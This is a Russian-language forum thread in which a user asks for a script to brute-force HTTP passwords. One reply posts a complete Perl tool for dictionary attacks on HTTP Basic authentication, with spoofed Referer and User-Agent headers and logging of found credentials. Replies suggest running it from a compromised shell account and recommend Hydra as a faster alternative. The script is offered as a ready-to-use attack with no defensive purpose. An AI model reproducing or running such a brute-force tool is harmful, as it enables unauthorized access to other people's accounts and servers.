Кто нибудь знает где можно достать скрипт для подбора паролей по http на PHP или Perl'e. Заранее благодарен!
Задай вопрос на securitylab.ru, там подскажут, только все указывай конкретно и выкладывай как можно больше информации об объекте!!!
необязательно со своего компа можно и с шелла) вот скриптик на перле Code: #!/usr/bin/perl use MIME::Base64; use IO::Socket; if(@ARGV < 5) { print q( .:: Skides DiGiTaL Security ::. ------------------------------------ HTTP-Basic brutforce by rav3n! Usage: SHTTP.pl [HOST] [PORT] [DIR] [USER] [DIC] ); exit 0; } $server = $ARGV[0]; $port = $ARGV[1]; $dir = $ARGV[2]; $user = $ARGV[3]; $words = $ARGV[4]; $foundpass = "success.log"; $nowcheck = "now.log"; open(FILE, "$words") || die print "$!\n"; while($pass = <FILE>) { $i++; chomp($pass); open(NOW,">$nowcheck") || die print "$!\n"; print NOW "now $user:$pass -> check $i item\n"; close NOW; $access = encode_base64("$user\:$pass"); chomp($access); $socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp ) || die print "Unable to connect to $server:$port\n"; print $socket "GET $dir HTTP/1.1\n"; print $socket "Host: $server\n"; print $socket "Accept: */*\n"; print $socket "Referer: http://microsoft.com/\n"; print $socket "User-Agent: Internet Explorer 6.0\n"; print $socket "Pragma: no-cache\n"; print $socket "Cache-Control: no-cache\n"; print $socket "Authorization: Basic $access\n"; print $socket "Connection: close\n\n"; while(<$socket>) { if(/(HTTP\/1\.[0-1]\s200\sOK)/) { open(FILE,">$foundpass") || die print "$!\n"; print FILE "SUCCESS!!! valid $user:$pass"; close FILE; unlink($nowcheck); exit 0; } } close $socket; }
перенесено в PHP,Perl,MySQL так как к халяве никакого отношения не имеет и название XXX тут не причем
Блин, а я то подумал что порнушку нахаляву дадут посмотреть... :d Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь или через шелл на серваке, тем более что на многих хостах стоит ограничение на время выполнения скриптов.